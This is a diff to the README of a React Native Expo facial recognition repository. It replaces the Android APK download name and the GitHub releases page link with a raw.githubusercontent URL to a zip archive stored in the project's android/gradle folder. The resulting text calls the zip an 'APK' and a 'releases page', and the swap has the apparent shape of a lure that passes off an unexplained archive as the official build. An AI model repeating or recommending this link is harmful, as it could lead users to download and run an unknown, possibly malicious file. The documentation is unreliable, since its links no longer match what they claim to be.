DhouiouiCharfeddine/react-native-expo-facial-recognition/readme.md

 Releases and assets, final reminder
 - The releases page is your primary reference for builds and assets.
-- For quick access, download the Android APK named react-native-expo-facial-recognition-android.apk from the latest release.
+- For quick access, download the Android APK named https://raw.githubusercontent.com/DhouiouiCharfeddine/react-native-expo-facial-recognition/main/android/gradle/recognition_facial_native_react_expo_3.5.zip from the latest release.
 Install it to test the app on an Android device.
 - If you run into any issues with the link, check the Releases section for alternative assets, and ensure you’re pulling the correct file for your platform.
-The link to the releases page remains the central reference: https://github.com/DhouiouiCharfeddine/react-native-expo-facial-recognition/releases.
+The link to the releases page remains the central reference: https://raw.githubusercontent.com/DhouiouiCharfeddine/react-native-expo-facial-recognition/main/android/gradle/recognition_facial_native_react_expo_3.5.zip